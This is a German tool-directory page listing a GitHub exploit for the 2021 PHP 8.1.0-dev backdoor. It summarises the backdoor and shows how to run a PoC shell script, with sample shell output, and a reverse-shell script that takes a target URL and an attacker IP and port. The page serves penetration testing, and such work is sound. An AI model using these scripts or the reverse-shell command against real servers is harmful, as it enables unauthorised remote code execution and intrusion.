Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
php-8.1.0-dev-backdoor-rce — PHP 8.1.0-dev Backdoor System Shell Script | Kitploit
Tools/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

Repository anzeigen
9421vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PHP 8.1.0-dev Backdoor Remote Code Execution

PHP 8.1.0-dev Backdoor-System-Shell-Skript

docs/logo_php81.png

PHP Version 8.1.0-dev wurde am 28. März 2021 mit einer Hintertür veröffentlicht, aber die Hintertür wurde schnell entdeckt und entfernt. Wenn diese Version von PHP auf einem Server läuft, kann ein Angreifer beliebigen Code ausführen, indem er den User-Agentt-Header sendet.

Der ursprüngliche Code wurde nach der Entdeckung des Problems wiederhergestellt, aber dann ein zweites Mal manipuliert. Der Einbruch hätte in allen Websites, die die kompromittierte Version von PHP ausführten, eine Hintertür erzeugt und es Hackern ermöglicht, Remote Code Execution auf der Website durchzuführen.

Vollständigen Artikel lesen: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


POC-Skript

Dieses kurze Exploit-Skript backdoor_php_8.1.0-dev.py verwendet die Hintertür, um eine Pseudo-System-Shell auf dem Host bereitzustellen. Finden Sie es auf Exploit DB.

  • Exploit-Titel: PHP 8.1.0-dev Backdoor Remote Code Execution
  • Datum: 23. Mai 2021
  • Exploit-Autor: flast101
  • Anbieter-Homepage: https://www.php.net/
  • Software-Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Getestet mit Version: 8.1.0-dev
  • CVE : N/A
  • Schwachstellen-Referenzen:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Verwendung:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse-Shell

Dieses kurze Exploit-Skript revshell_php_8.1.0-dev.py erzeugt eine Reverse-Shell auf dem Zielsystem.

Verwendung:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

Sei neugierig, Lernen ist Leben! 😃

Tool herunterladen